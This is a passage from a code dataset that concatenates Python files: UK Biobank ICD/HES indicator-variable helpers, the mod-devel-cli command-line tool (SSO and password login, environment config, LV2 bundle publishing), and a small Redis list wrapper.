                return dfb.drop([str(gen_count_name)],axis=1)
    if ct_only==True:
        return dfb.drop([str(gen_ind_name)],axis=1)
def mm_gen_ind_list(fid_in, key_code_list, evt, detai=False, get_ct=False, ct_only=False):
    """
    Build indicator variables for every code in *key_code_list* (one call to
    mm_gen_ind_raw per code) and merge them column-wise on eid.

    Flags mirror mm_gen_ind_raw: detai -> detailed matched-code columns,
    get_ct -> keep counts, ct_only -> counts only (overrides the others).

    FIX: the original expanded every flag combination into eight duplicated
    loop bodies; collapsed into one loop that forwards the flags, with
    ct_only forcing detail=False/get_ct=False exactly as before.
    """
    frames = []
    for code in key_code_list:
        if ct_only:
            frame = mm_gen_ind_raw(fid_in, code, str(evt), detail=False, get_ct=False, ct_only=True)
        else:
            frame = mm_gen_ind_raw(fid_in, code, str(evt), detail=detai, get_ct=get_ct, ct_only=False)
        frames.append(frame)
    merged = pd.concat(frames, axis=1)
    # Drop the duplicated 'eid' columns produced by the column-wise concat.
    merged = merged.loc[:, ~merged.columns.duplicated()]
    return merged
def gen_event_ind_from_list(fid_int, event_code_list):
    """
    return a dataframe that contains indicator variables for each pair of event and its related ICD code
    """
    # Each entry of event_code_list is (event_label, list_of_key_codes).
    frames = []
    for lev1 in event_code_list:
        print('load event: ' + str(lev1[0]))
        frames.append(mm_gen_ind_list(fid_in=fid_int, evt=lev1[0], key_code_list=lev1[1]))
    pooled = pd.concat(frames, axis=1)
    pooled = pooled.loc[:, ~pooled.columns.duplicated()]  # drop duplicated 'eid' columns
    return pooled
def gen_event_ind_from_multi_var(fid_list, event_code_list, detail=False):
    """
    return a dataframe that contains indicator variables for each event combined multiple icd measurements

    With detail=False (default) the per-code columns are collapsed into a
    single 0/1 'icd_ind_<event>' column per event; with detail=True the raw
    pooled frame is returned instead.
    """
    f_pool = []
    for f in fid_list:
        print('\n working on fid= ' + str(f))
        f_pool.append(gen_event_ind_from_list(fid_int=f, event_code_list=event_code_list))
    f_pooled = pd.concat(f_pool, axis=1)
    f_pooled = f_pooled.loc[:, ~f_pooled.columns.duplicated()]  # drop duplicated 'eid' columns
    if detail:
        return f_pooled
    ind_pool = []
    for e in event_code_list:
        event = e[0]
        # columns whose names contain this event label (regex match)
        df_pre = f_pooled.filter(regex=event)
        ind_name = 'icd_ind_' + str(event)
        df_e = pd.DataFrame({'eid': f_pooled.eid, ind_name: df_pre.sum(axis=1)})
        # clip positive match counts down to a 0/1 indicator
        df_e[ind_name] = df_e[ind_name].apply(lambda y: 1 if y > 0 else y)
        df_e = df_e.loc[:, ~df_e.columns.duplicated()]  # drop duplicated 'eid' columns
        ind_pool.append(df_e)
    ind_pooled = pd.concat(ind_pool, axis=1)
    ind_pooled = ind_pooled.loc[:, ~ind_pooled.columns.duplicated()]  # drop duplicated 'eid' columns
    return ind_pooled
############# functions for HES ################
def hes_gen_ind_raw(icd, hesin_dfin, key_code, evnt, detail=False):
    """
    return a dataframe that contains indicator variable for a specific 'key_code' in HES data
    use 'detail= True' to get the detail matched code info
    """
    # dfa.columns[dfa.columns.get_loc(x)] is just x itself, so index the
    # columns by name directly.
    icd_col = str(icd)
    dfa = hesin_dfin[['eid', 'record_id', icd_col]].copy()
    # lst_ind returns, per row, the (possibly empty) match for key_code
    pre0 = lst_ind(dfa[icd_col].values.tolist(), str(key_code))
    gen_hes_name = 'hes_' + icd_col + '_' + str(evnt) + str(key_code)
    gen_ind_name = 'ind_' + icd_col + '_' + str(evnt) + str(key_code)
    # detail column: matched codes, or NaN when nothing matched
    dfa[gen_hes_name] = pre0
    dfa[gen_hes_name] = dfa[gen_hes_name].apply(lambda y: np.nan if len(y) == 0 else y)
    # indicator column: 1 when at least one code matched, else 0
    dfa[gen_ind_name] = pre0
    dfa[gen_ind_name] = dfa[gen_ind_name].apply(lambda y: 0 if len(y) == 0 else 1)
    print('\nHES ' + icd_col + ' ',
          str(evnt) + '(' + str(key_code) + ')' + ' count: ' + str(dfa[gen_hes_name].count())
          + ',\nFreq_tab \n' + str(dfa[gen_ind_name].value_counts()))
    if detail == True:
        return dfa
    else:
        return dfa[['eid', 'record_id', gen_ind_name]]
def hes_gen_ind_list(icd_in, hesin_dfin, key_code_list, evt, detai=False):
    """
    return a dataframe that contains indicator variables for each specific 'key_code' in 'key_code_list'
    use 'detai= True' to get the detail matched codes info
    """
    # Both original branches were identical apart from the detail flag that
    # is forwarded to hes_gen_ind_raw, so forward it directly.
    dfcl = [hes_gen_ind_raw(icd_in, hesin_dfin, l, str(evt), detail=detai)
            for l in key_code_list]
    dfcl_merge = pd.concat(dfcl, axis=1)
    dfcl_merge = dfcl_merge.loc[:, ~dfcl_merge.columns.duplicated()]  # drop duplicated 'eid' columns
    return dfcl_merge
def hes_gen_event_ind_from_list(icd_var, hes_df, event_code_list):
    """
    return a dataframe that contains indicator variables for each pair of event and its related ICD code from HES database
    """
    collected = []
    for lev1 in event_code_list:
        print('load event: ' + str(lev1[0]))
        collected.append(hes_gen_ind_list(icd_in=icd_var, hesin_dfin=hes_df,
                                          evt=lev1[0], key_code_list=lev1[1]))
    merged = pd.concat(collected, axis=1)
    merged = merged.loc[:, ~merged.columns.duplicated()]  # drop duplicated 'eid' columns
    return merged
def hes_gen_event_ind_from_multi_var(icd_var_list, hes_dfin, event_code_list, detail=False):
    """
    return a dataframe that contains indicator variables for each event combined multiple icd measurements
    """
    per_var = []
    for var in icd_var_list:
        print('\n working on icd_var= ' + str(var))
        per_var.append(hes_gen_event_ind_from_list(icd_var=var, hes_df=hes_dfin,
                                                   event_code_list=event_code_list))
    pooled = pd.concat(per_var, axis=1)
    pooled = pooled.loc[:, ~pooled.columns.duplicated()]  # drop duplicated 'eid' columns
    if detail == True:
        return pooled
    if detail == False:
        indicators = []
        for entry in event_code_list:
            event = entry[0]
            matched = pooled.filter(regex=event)
            ind_name = 'hes_icd_ind_' + str(event)
            frame = pd.DataFrame({'eid': pooled.eid,
                                  'record_id': pooled.record_id,
                                  ind_name: matched.sum(axis=1)})
            # clip positive match counts down to a 0/1 indicator
            frame[ind_name] = frame[ind_name].apply(lambda y: 1 if y > 0 else y)
            frame = frame.loc[:, ~frame.columns.duplicated()]  # drop duplicated 'eid' columns
            indicators.append(frame)
        combined = pd.concat(indicators, axis=1)
        combined = combined.loc[:, ~combined.columns.duplicated()]  # drop duplicated 'eid' columns
        return combined
| Python | 432 | 35.495369 | 239 | /ukbb.py | 0.582547 | 0.574758 |
postincredible/ukbb | refs/heads/master | import os
import pandas as pd
import numpy as np
def load_data_by_fid(fid):
    '''
    return a dataframe that has the eid and the 'fid' variable

    Looks the field id up in the master variable table, then loads the
    matching per-variable CSV from the type-specific folder.  Returns None
    (after printing a message) when the fid or its data file cannot be found.
    The original crashed with UnboundLocalError when neither candidate file
    existed, and mutated the process CWD via os.chdir just to list a folder.
    '''
    df_tab1_i0_comp = pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
    if int(fid) not in df_tab1_i0_comp.fid.values.tolist():
        print('fid not found, please try again')
        return None
    fid_num = fid
    row = df_tab1_i0_comp[df_tab1_i0_comp['fid'] == int(fid_num)]
    var_description = row.Description.values[0]
    var_type = row.Type.values[0]
    # short folder code for each variable type, parallel to the full names
    var_type_list = ['con', 'cur', 'dat', 'int', 'tex', 'tim', 'cas', 'cam']
    var_type_list_full = ['Continuous', 'Curve', 'Date', 'Integer', 'Text', 'Time',
                          'Categorical (single)', 'Categorical (multiple)']
    path_p1 = '/temp_project/ukbb/data/i0/var_'
    if var_type not in var_type_list_full:
        print('unknown variable type: ' + str(var_type))
        return None
    vtyp = var_type_list[var_type_list_full.index(var_type)]
    loadpath = path_p1 + str(vtyp) + '/'
    # list the folder directly instead of chdir()-ing into it (no cwd side effect)
    list_folder = os.listdir(loadpath)
    pname1 = str(vtyp) + str(fid_num) + 'i0.csv'
    pname2 = 'vec_' + str(vtyp) + str(fid_num) + 'i0.csv'
    if pname1 in list_folder:
        print('fid ' + str(fid_num) + ' is a single-measure ' + str(var_type).lower()
              + ' variable, which is \n' + str(var_description))
        return pd.read_csv(loadpath + pname1)
    if pname2 in list_folder:
        print('fid ' + str(fid_num) + ' is a single-measure ' + str(var_type).lower()
              + ' variable, which is \n' + str(var_description))
        # vectorised variables are stored tab-separated
        return pd.read_csv(loadpath + pname2, sep='\t')
    print('data file for fid ' + str(fid_num) + ' not found in ' + loadpath)
    return None
| Python | 46 | 36.97826 | 134 | /ukbb_ldbf.py | 0.602175 | 0.583286 |
moddevices/mod-devel-cli | refs/heads/master | import click
import crayons
from modcli import context, auth, __version__, bundle
# Confirmation prompt shown before the SSO flow unless --confirm-all is passed.
_sso_disclaimer = '''SSO login requires you have a valid account in MOD Forum (https://forum.moddevices.com).
If your browser has an active session the credentials will be used for this login. Confirm?'''
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.version_option(prog_name='modcli', version=__version__)
def main():
    # Root command group; subgroups (auth/bundle/config) are attached below.
    pass
@click.group(name='auth', help='Authentication commands')
def auth_group():
    # Container group for the auth subcommands registered at module bottom.
    pass
@click.group(name='bundle', help='LV2 bundle commands')
def bundle_group():
    # Container group for the bundle subcommands registered at module bottom.
    pass
@click.group(name='config', help='Configuration commands')
def config_group():
    # Container group for the config subcommands registered at module bottom.
    pass
@click.command(help='Authenticate user with SSO (MOD Forum)')
@click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
@click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
@click.option('-y', '--confirm-all', type=bool, help='Confirm all operations', is_flag=True)
@click.option('-d', '--detached-mode', type=bool, help='Run process without opening a local browser', is_flag=True)
@click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
def login_sso(show_token: bool, one_time: bool, confirm_all: bool, detached_mode: bool, env_name: str):
    """Obtain a JWT via the MOD Forum SSO flow and optionally persist it."""
    if env_name:
        context.set_active_env(env_name)
    env = context.current_env()
    if not confirm_all and not click.confirm(_sso_disclaimer):
        exit(1)
    persist = not one_time
    if persist:
        click.echo('Logging in to [{0}]...'.format(env.name))
    sso_login = auth.login_sso_detached if detached_mode else auth.login_sso
    try:
        token = sso_login(env.api_url)
    except Exception as ex:
        click.echo(crayons.red(str(ex)), err=True)
        exit(1)
        return
    if persist:
        env.set_token(token)
        context.save()
    if show_token or one_time:
        print(token.strip())
    else:
        click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(env.username, env.name)))
@click.command(help='Authenticate user')
@click.option('-u', '--username', type=str, prompt=True, help='User ID')
@click.option('-p', '--password', type=str, prompt=True, hide_input=True, help='User password')
@click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
@click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
@click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
def login(username: str, password: str, show_token: bool, one_time: bool, env_name: str):
    """Password login against the MOD API; optionally persist the token."""
    if env_name:
        context.set_active_env(env_name)
    env = context.current_env()
    persist = not one_time
    if persist:
        click.echo('Logging in to [{0}]...'.format(env.name))
    try:
        token = auth.login(username, password, env.api_url)
    except Exception as ex:
        click.echo(crayons.red(str(ex)), err=True)
        exit(1)
        return
    if persist:
        env.set_token(token)
        context.save()
    if show_token or one_time:
        print(token.strip())
    else:
        click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(username, env.name)))
@click.command(help='Remove all tokens and reset context data')
def clear_context():
    """Wipe the stored tokens and environments from disk."""
    # exit() raises SystemExit, so the success message only runs via `else`
    try:
        context.clear()
    except Exception as ex:
        click.echo(crayons.red(str(ex)), err=True)
        exit(1)
    else:
        click.echo(crayons.green('Context cleared'))
@click.command(help='Show current active access JWT token')
@click.option('-e', '--env_name', type=str, help='Show current active token from a specific environment')
def active_token(env_name: str):
    """Print the stored JWT for the active (or given) environment."""
    if env_name:
        context.set_active_env(env_name)
    token = context.active_token()
    if token:
        click.echo(token)
        return
    click.echo(crayons.red('You must authenticate first.'), err=True)
    click.echo('Try:\n $ modcli auth login')
    exit(1)
@click.command(help='Set active environment, where ENV_NAME is the name')
@click.argument('env_name')
def set_active_env(env_name: str):
    """Switch the persisted active environment to *env_name*."""
    try:
        context.set_active_env(env_name)
        context.save()
    except Exception as ex:
        click.echo(crayons.red(str(ex)), err=True)
        exit(1)
    else:
        click.echo(crayons.green('Current environment set to: {0}'.format(env_name)))
@click.command(help='Add new environment, where ENV_NAME is the name, API_URL '
                    'and BUNDLE_URL are the API entry points')
@click.argument('env_name')
@click.argument('api_url')
@click.argument('bundle_url')
def add_env(env_name: str, api_url: str, bundle_url: str):
    """Register a new environment and make it the active one."""
    try:
        context.add_env(env_name, api_url, bundle_url)
        context.set_active_env(env_name)
        context.save()
    except Exception as ex:
        click.echo(crayons.red(str(ex)), err=True)
        exit(1)
    else:
        click.echo(crayons.green('Environment [{0}] added and set as active'.format(env_name)))
@click.command(help='List current configuration', name='list')
def list_config():
    """Show the active environment, auth status and known environments."""
    env = context.current_env()
    authenticated = 'Yes' if env.token else 'No'
    click.echo('Active environment: {0}'.format(env.name))
    click.echo('Authenticated in [{0}]: {1}'.format(env.name, authenticated))
    click.echo('Registered environments: {0}'.format(list(context.environments.keys())))
@click.command(help='Publish LV2 bundles, where PROJECT_FILE points to the buildroot project descriptor file (JSON)')
@click.argument('project_file')
@click.option('-p', '--packages-path', type=str, help='Path to buildroot package')
@click.option('-s', '--show-result', type=bool, help='Print pipeline process result', is_flag=True)
@click.option('-k', '--keep-environment', type=bool, help='Don\'t remove build environment after build', is_flag=True)
@click.option('-r', '--rebuild', type=bool, help='Don\'t increment release number, just rebuild', is_flag=True)
@click.option('-e', '--env', type=str, help='Environment where the bundles will be published')
@click.option('-f', '--force', type=bool, help='Don\'t ask for confirmation', is_flag=True)
def publish(project_file: str, packages_path: str, show_result: bool, keep_environment: bool,
            rebuild: bool, env: str, force: bool):
    """CLI front-end that forwards to modcli.bundle.publish, rendering failures in red."""
    try:
        bundle.publish(project_file, packages_path, show_result=show_result,
                       keep_environment=keep_environment, rebuild=rebuild,
                       env_name=env, force=force)
    except Exception as ex:
        click.echo(crayons.red(str(ex)), err=True)
        exit(1)
# Wire subcommands into their groups, then the groups into the root command.
auth_group.add_command(active_token)
auth_group.add_command(login)
auth_group.add_command(login_sso)
bundle_group.add_command(publish)
config_group.add_command(add_env)
config_group.add_command(set_active_env)
config_group.add_command(list_config)
config_group.add_command(clear_context)
main.add_command(auth_group)
main.add_command(bundle_group)
main.add_command(config_group)
# Script entry point (also exposed as console_script 'modcli' by setup.py).
if __name__ == '__main__':
    main()
| Python | 196 | 35.591835 | 118 | /modcli/cli.py | 0.659649 | 0.656581 |
moddevices/mod-devel-cli | refs/heads/master | from modcli import config
# Package version string (setup.py parses this line with a regex).
__version__ = '1.1.3'
# Process-wide CLI context, loaded once when the package is imported.
context = config.read_context()
| Python | 5 | 15.4 | 31 | /modcli/__init__.py | 0.682927 | 0.646341 |
moddevices/mod-devel-cli | refs/heads/master | import re
import sys
from setuptools import setup
# Single-source the version: parse it out of modcli/__init__.py.
with open('modcli/__init__.py', 'r') as fh:
    version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', fh.read(), re.MULTILINE).group(1)
# Fail fast when invoked with Python 2 (python_requires only helps modern pip).
if sys.version_info[0] < 3:
    raise Exception("Must be using Python 3")
setup(
    name='mod-devel-cli',
    python_requires='>=3',
    version=version,
    description='MOD Command Line Interface',
    author='Alexandre Cunha',
    author_email='alex@moddevices.com',
    license='Proprietary',
    install_requires=[
        'click==6.7',
        'crayons==0.1.2',
        'requests>=2.18.4',
    ],
    packages=[
        'modcli',
    ],
    entry_points={
        'console_scripts': [
            'modcli = modcli.cli:main',
        ]
    },
    classifiers=[
        'Intended Audience :: Developers',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
    ],
    url='http://moddevices.com/',
)
| Python | 41 | 23.512196 | 100 | /setup.py | 0.549254 | 0.534328 |
moddevices/mod-devel-cli | refs/heads/master | import os
# Directory holding context.json and the mirrored access_token file.
CONFIG_DIR = os.path.expanduser('~/.config/modcli')
# Known deployment environments: name -> (api_url, bundle_url).
URLS = {
    'labs': ('https://api-labs.moddevices.com/v2', 'https://pipeline-labs.moddevices.com/bundle/'),
    'dev': ('https://api-dev.moddevices.com/v2', 'https://pipeline-dev.moddevices.com/bundle/'),
}
# Environment activated when the context is first created.
DEFAULT_ENV = 'labs'
| Python | 8 | 35.5 | 99 | /modcli/settings.py | 0.664384 | 0.657534 |
moddevices/mod-devel-cli | refs/heads/master | import base64
import json
import os
import stat
import re
from modcli import settings
from modcli.utils import read_json_file
def read_context():
    """Load the persisted CLI context, seeding defaults on first run."""
    ctx = CliContext.read(settings.CONFIG_DIR)
    if not ctx.environments:
        # first run: register the built-in environments and persist them
        for name, (api_url, bundle_url) in settings.URLS.items():
            ctx.add_env(name, api_url, bundle_url)
        ctx.set_active_env(settings.DEFAULT_ENV)
        ctx.save()
    return ctx
def clear_context():
    """Remove the persisted context files under the default config directory.

    Bug fix: ``CliContext.clear`` is an *instance* method, so the original
    ``CliContext.clear(settings.CONFIG_DIR)`` passed the path string as
    ``self`` and crashed with AttributeError (str has no ``_path``).
    Build a context over the config dir and clear that instead.
    """
    CliContext(settings.CONFIG_DIR).clear()
def _write_file(path: str, data: str, remove_existing: bool=True):
# create dir if doesn't exist
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname, exist_ok=True)
# remove previous file
if remove_existing:
if os.path.isfile(path):
os.remove(path)
# write json file
with os.fdopen(os.open(path, os.O_WRONLY | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR), 'w') as fh:
fh.write(data)
fh.writelines(os.linesep)
def _write_json_file(path: str, data: dict, remove_existing: bool=True):
    # Serialize *data* as pretty-printed JSON and delegate to _write_file.
    _write_file(path, json.dumps(data, indent=4), remove_existing)
def _remove_file(path: str):
if os.path.isfile(path):
os.remove(path)
class CliContext(object):
    """Persisted CLI state: the set of known environments plus the active one.

    Serialized to ``context.json`` under the configured path; the active
    environment's JWT is additionally mirrored to an ``access_token`` file
    so external tools can read it.
    """
    _filename = 'context.json'
    _access_token_filename = 'access_token'
    @staticmethod
    def read(path: str):
        """Load a CliContext from *path*; returns an empty context when no file exists."""
        context = CliContext(path)
        data = read_json_file(os.path.join(path, CliContext._filename))
        if not data:
            return context
        for env_data in data['environments']:
            context.add_env(env_data['name'], env_data['api_url'], env_data['bundle_url'])
            env = context.environments[env_data['name']]
            env.username = env_data['username']
            env.token = env_data['token']
            env.exp = env_data['exp']
        context.set_active_env(data['active_env'])
        return context
    def __init__(self, path: str):
        self._path = path
        self._active_env = ''
        # name -> EnvSettings
        self.environments = {}
    def _ensure_env(self, env_name: str):
        # Raise when *env_name* is not a registered environment.
        if env_name not in self.environments:
            raise Exception('Environment {0} doen\'t exist'.format(env_name))
    def set_active_env(self, env_name: str):
        """Select *env_name* as the active environment; an empty name clears the selection."""
        if not env_name:
            self._active_env = ''
        else:
            self._ensure_env(env_name)
            self._active_env = env_name
    def add_env(self, env_name: str, api_url: str, bundle_url: str):
        """Register a new environment after validating its name and both URLs."""
        if not env_name:
            raise Exception('Environment name is invalid')
        if env_name in self.environments:
            raise Exception('Environment {0} already exists'.format(env_name))
        if not re.match('https?://.*', api_url):
            raise Exception('Invalid api_url: {0}'.format(api_url))
        # NOTE(review): message says api_url but this validates bundle_url
        if not re.match('https?://.*', bundle_url):
            raise Exception('Invalid api_url: {0}'.format(bundle_url))
        self.environments[env_name] = EnvSettings(env_name, api_url, bundle_url)
    def remove_env(self, env_name: str):
        """Forget a registered environment."""
        self._ensure_env(env_name)
        del self.environments[env_name]
    def active_token(self):
        """Return the JWT of the active environment ('' when not authenticated)."""
        return self.current_env().token
    def current_env(self):
        """Return the active EnvSettings; raises when no environment is selected."""
        if not self._active_env:
            raise Exception('Not environment has been set')
        return self.environments[self._active_env]
    def get_env(self, env_name: str=None):
        """Return the named environment, or the active one when *env_name* is falsy."""
        if not env_name:
            return self.current_env()
        self._ensure_env(env_name)
        return self.environments[env_name]
    def save(self):
        """Write context.json and mirror the active token to its own file.

        NOTE(review): active_token() raises when no environment is selected,
        so save() assumes set_active_env was called first — confirm callers.
        """
        data = {
            'active_env': self._active_env,
            'environments': list({
                'name': e.name,
                'api_url': e.api_url,
                'bundle_url': e.bundle_url,
                'username': e.username,
                'token': e.token,
                'exp': e.exp,
            } for e in self.environments.values())
        }
        _write_json_file(os.path.join(self._path, CliContext._filename), data)
        active_token = self.active_token()
        if active_token:
            _write_file(os.path.join(self._path, CliContext._access_token_filename), active_token)
        else:
            _remove_file(os.path.join(self._path, CliContext._access_token_filename))
    def clear(self):
        """Delete the persisted files and drop all in-memory environments."""
        _remove_file(os.path.join(self._path, CliContext._filename))
        _remove_file(os.path.join(self._path, CliContext._access_token_filename))
        self.environments.clear()
class EnvSettings(object):
    """Per-environment settings: API endpoints plus the cached auth token."""
    def __init__(self, name: str, api_url: str, bundle_url: str):
        self.name = name
        # normalise away trailing slashes so later URL joins are predictable
        self.api_url = api_url.rstrip('/')
        self.bundle_url = bundle_url.rstrip('/')
        self.username = ''
        self.token = ''
        self.exp = ''
    def set_token(self, token: str):
        """Store *token* and pull user id / expiry out of its JWT payload."""
        _header, payload, _signature = token.split('.')
        # the extra '===' pads the unpadded base64url payload for b64decode
        claims = json.loads(base64.b64decode(payload + '===').decode())
        self.username = claims['user_id']
        self.token = token
        self.exp = claims.get('exp', None)
| Python | 158 | 31.493671 | 100 | /modcli/config.py | 0.589794 | 0.587067 |
moddevices/mod-devel-cli | refs/heads/master | import socket
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import parse
import click
import requests
from click import Abort
from modcli import __version__
def login(username: str, password: str, api_url: str):
    """Exchange username/password for a JWT at the MOD API; raise on failure."""
    payload = {
        'user_id': username,
        'password': password,
        'agent': 'modcli:{0}'.format(__version__),
    }
    result = requests.post('{0}/users/tokens'.format(api_url), json=payload)
    if result.status_code != 200:
        raise Exception('Error: {0}'.format(result.json()['error-message']))
    return result.json()['message'].strip()
def get_open_port():
    """Ask the OS for a free TCP port by binding to port 0, then release it."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.bind(("", 0))
        probe.listen(1)
        return probe.getsockname()[1]
    finally:
        probe.close()
def login_sso_detached(api_url: str):
    """Walk the user through the SSO flow manually and read the token from stdin."""
    click.echo('Running in detached mode...')
    click.echo('1) Open this url in any browser: {0}'.format('{0}/users/tokens_sso'.format(api_url)))
    click.echo('2) The URL will automatically redirect to MOD Forum (https://forum.moddevices.com)')
    click.echo('3) Once MOD Forum page loads, if asked, enter your credentials or register a new user')
    click.echo('4) A JWT token will be displayed in your browser')
    try:
        return click.prompt('Copy the token value and paste it here, then press ENTER').strip()
    except Abort:
        # user hit Ctrl-C at the prompt
        exit(1)
def login_sso(api_url: str):
    """Run the browser-based SSO flow.

    Starts a one-shot local HTTP server, opens the SSO URL in the default
    browser and waits (30s timeout) for the redirect carrying the token.
    Raises when no token was delivered.
    """
    server_host = 'localhost'
    server_port = get_open_port()
    local_server = 'http://{0}:{1}'.format(server_host, server_port)
    class SSORequestHandler(BaseHTTPRequestHandler):
        # class attribute so the outer function can read it after handling
        token = ''
        def do_HEAD(self):
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
        def do_GET(self):
            response = self.handle_http(200)
            _, _, _, query, _ = parse.urlsplit(self.path)
            result = parse.parse_qs(query)
            # fix: parse_qs omits the key entirely when absent, so the
            # original `len(result.get('token', None))` raised TypeError
            # on a redirect without a token parameter
            tokens = result.get('token') or []
            SSORequestHandler.token = tokens[0] if len(tokens) > 0 else None
            self.wfile.write(response)
        def handle_http(self, status_code):
            self.send_response(status_code)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            content = '''
            <html><head><title>modcli - success</title></head>
            <body>Authentication successful! This browser window can be closed.</body></html>
            '''
            return bytes(content, 'UTF-8')
        def log_message(self, format, *args):
            # keep the CLI output clean: suppress per-request access logs
            pass
    httpd = HTTPServer((server_host, server_port), SSORequestHandler)
    httpd.timeout = 30
    webbrowser.open('{0}/users/tokens_sso?local_url={1}'.format(api_url, local_server))
    try:
        # serve exactly one request (the SSO redirect), or time out
        httpd.handle_request()
    except KeyboardInterrupt:
        pass
    token = SSORequestHandler.token
    if not token:
        raise Exception('Authentication failed!')
    return token
| Python | 93 | 31.258064 | 103 | /modcli/auth.py | 0.618 | 0.607667 |
moddevices/mod-devel-cli | refs/heads/master | import os
import shutil
import subprocess
import tempfile
from hashlib import md5
import click
import crayons
import requests
from modcli import context
from modcli.utils import read_json_file
def publish(project_file: str, packages_path: str, keep_environment: bool=False, bundles: list=None,
            show_result: bool=False, rebuild: bool=False, env_name: str=None, force: bool=False):
    """Package a buildroot plugin project and submit it to the MOD release pipeline.

    Reads the JSON project descriptor, tars the buildroot package found under
    *packages_path*, creates a release process via the bundle API, uploads the
    tarball and verifies its MD5 checksum.  Raises an Exception on any failure.
    """
    project_file = os.path.realpath(project_file)
    packages_path = os.path.realpath(packages_path) if packages_path else None
    env = context.get_env(env_name)
    if not env.token:
        raise Exception('You must authenticate first')
    if not os.path.isfile(project_file):
        raise Exception('File {0} not found or not a valid file'.format(project_file))
    if packages_path:
        if not os.path.isdir(packages_path):
            raise Exception('Packages path {0} not found'.format(packages_path))
    else:
        # default: look for packages next to the project descriptor
        packages_path = os.path.dirname(project_file)
    project = os.path.split(project_file)[1]
    if not force and not click.confirm('Project {0} will be compiled and published in [{1}], '
                                       'do you confirm?'.format(crayons.green(project), crayons.green(env.name))):
        raise Exception('Cancelled')
    process = read_json_file(project_file)
    # setting up process data
    if keep_environment:
        process['keep_environment'] = True
    process['rebuild'] = rebuild
    buildroot_pkg = process.pop('buildroot_pkg', None)
    mk_filename = '{0}.mk'.format(buildroot_pkg)
    if not buildroot_pkg:
        raise Exception('Missing buildroot_pkg in project file')
    if bundles:
        # restrict the submission to the requested bundle subset
        process['bundles'] = [b for b in process['bundles'] if b['name'] in bundles]
        if not process['bundles']:
            raise Exception('Could not match any bundle from: {0}'.format(bundles))
    # find buildroot_pkg under packages_path
    mk_path = next((i[0] for i in os.walk(packages_path) if mk_filename in i[2]), None)
    if not mk_path:
        raise Exception('Could not find buildroot mk file for package {0} in {1}'.format(buildroot_pkg, packages_path))
    basename = os.path.basename(mk_path)
    if basename != buildroot_pkg:
        raise Exception('The package folder containing the .mk file has to be named {0}'.format(buildroot_pkg))
    pkg_path = os.path.dirname(mk_path)
    work_dir = tempfile.mkdtemp()
    try:
        package = '{0}.tar.gz'.format(buildroot_pkg)
        source_path = os.path.join(work_dir, package)
        try:
            # 'h' dereferences symlinks so the tarball is self-contained
            subprocess.check_output(
                ['tar', 'zhcf', source_path, buildroot_pkg], stderr=subprocess.STDOUT, cwd=os.path.join(pkg_path)
            )
        except subprocess.CalledProcessError as ex:
            raise Exception(ex.output.decode())
        click.echo('Submitting release process for project {0} using file {1}'.format(project_file, package))
        click.echo('URL: {0}'.format(env.bundle_url))
        headers = {'Authorization': 'MOD {0}'.format(env.token)}
        result = requests.post('{0}/'.format(env.bundle_url), json=process, headers=headers)
        if result.status_code == 401:
            raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
        elif result.status_code != 200:
            raise Exception('Error: {0}'.format(result.text))
        release_process = result.json()
        click.echo('Release process created: {0}'.format(release_process['id']))
        click.echo('Uploading buildroot package {0} ...'.format(package))
        with open(source_path, 'rb') as fh:
            data = fh.read()
        headers = {'Content-Type': 'application/octet-stream'}
        result = requests.post(release_process['source-href'], data=data, headers=headers)
        if result.status_code == 401:
            raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
        elif result.status_code != 201:
            raise Exception('Error: {0}'.format(result.text))
        # the server echoes back the MD5 of what it received (JSON-quoted)
        checksum = result.text.lstrip('"').rstrip('"')
        result_checksum = md5(data).hexdigest()
        if checksum == result_checksum:
            click.echo('Checksum match ok!')
        else:
            raise Exception('Checksum mismatch: {0} <> {1}'.format(checksum, result_checksum))
    finally:
        # always drop the temporary build directory, success or failure
        click.echo('Cleaning up...')
        shutil.rmtree(work_dir, ignore_errors=True)
    release_process_url = release_process['href']
    click.echo(crayons.blue('Process url: {0}?pretty=true'.format(release_process_url)))
    click.echo(crayons.green('Done'))
    if show_result:
        click.echo('Retrieving release process from {0} ...'.format(release_process_url))
        release_process_full = requests.get('{0}?pretty=true'.format(release_process_url)).text
        click.echo(crayons.blue('================ Release Process {0} ================'.format(release_process['id'])))
        click.echo(release_process_full)
        click.echo(crayons.blue('================ End Release Process ================'))
moddevices/mod-devel-cli | refs/heads/master | import json
import os
def read_json_file(path: str):
    """Parse *path* as JSON, returning an empty dict when the file is absent."""
    if os.path.isfile(path):
        with open(path, 'r') as fh:
            return json.loads(fh.read())
    return {}
| Python | 10 | 19.299999 | 33 | /modcli/utils.py | 0.615764 | 0.615764 |
sholong/utils_script | refs/heads/master | # -*- coding:utf-8 -*-
from redis import Redis
# Boundary indices for Redis lists (LRANGE/LTRIM take inclusive ends;
# -1 addresses the last element).
LEFTMOST = 0
RIGHTMOST = -1
class RedisListSecondPack:
    """Thin convenience wrapper around the Redis list commands for one key."""
    def __init__(self, name, client=None):
        # Fix: the original default `client=Redis()` created a single shared
        # connection object at import time; create one lazily per instance.
        self.name = name
        self.client = client if client is not None else Redis()
    def left_append(self, content):
        # LPUSH: prepend *content* at the head (left end) of the list.
        return self.client.lpush(self.name, content)
    def right_append(self, content):
        # RPUSH: append *content* at the tail (right end) of the list.
        return self.client.rpush(self.name, content)
